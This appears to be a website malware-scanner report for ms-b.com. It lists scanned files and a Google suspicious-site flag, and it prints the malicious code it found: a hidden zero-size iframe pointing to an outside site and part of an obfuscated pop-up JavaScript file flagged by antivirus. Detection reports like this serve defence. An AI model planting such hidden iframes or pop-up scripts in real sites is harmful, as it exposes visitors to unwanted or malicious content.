New scan:

Malware Scanner report for ms-b.com

Malicious/Suspicious/Total urls checked
1/0/8
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "ms-b.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/1/1
1 suspicious iframe found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ms-b.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.ms-b.com/
200 OK
Content-Length: 75827
Content-Type: text/html
clean
http://www.ms-b.com/ad/top.js
200 OK
Content-Length: 186
Content-Type: application/javascript
clean
http://www.ms-b.com/ad/3.js
200 OK
Content-Length: 128
Content-Type: application/javascript
suspicious
Hidden iFrame found.
size: 0x0     
src: http://www.honolulucentral.com/htmlad.htm

<iframe width=0 height=0 frameborder=0 scrolling=no src=http://www.honolulucentral.com/htmlad.htm>

http://v1.cnzz.com/z_stat.php?id=1000392505&web_id=1000392505
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://v1.cnzz.com/test404page.js
HTTP/1.1 302 Found
Connection: close
Date: Sun, 21 Sep 2014 02:36:40 GMT
Location: http://www.cnzz.com/404.html
Server: Tengine
Content-Length: 260
Content-Type: text/html
clean
http://www.cnzz.com/404.html
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://www.cnzz.com/test404page.js
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://www.ms-b.com/ad/tui2.js
200 OK
Content-Length: 4066
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.writeln("<SCRIPT language=\"javascript\">");
document.writeln("<!--");
document.writeln("var popURL1 = \'\http://www.honolulucentral.com/\';");
document.writeln("var isXPSP2 = false;");
document.writeln("var u = \"6BF52A52-394A-11D3-B153-00C04F79FAA6\";");
document.writeln("");
document.writeln("\/\/--------------------------------------------------------------------------------");
document.writeln(" ");
document.writeln("var str_url;
... 3452 bytes are skipped ...
xit = true;");
document.writeln(" var usePopDialog = true;");
document.writeln(" var isUsingSpecial = false;");
document.writeln("");
document.writeln(" function loadpopups(){");
document.writeln(" if(doexit && !isUsingSpecial) {");
document.writeln(" doexit = false;");
document.writeln(" window.open(popURL1,\"llllll\",popWindowOptions);");
document.writeln(" }");
document.writeln(" }");
document.writeln("<\/script>");

Antivirus reports:

Avast
JS:Agent-LY [PUP]


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ms-b.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ms-b.com
Referer: http://www.google.com/search?q=ms-b.com

Result:
The result is similar to the first query. There are no suspicious redirects found.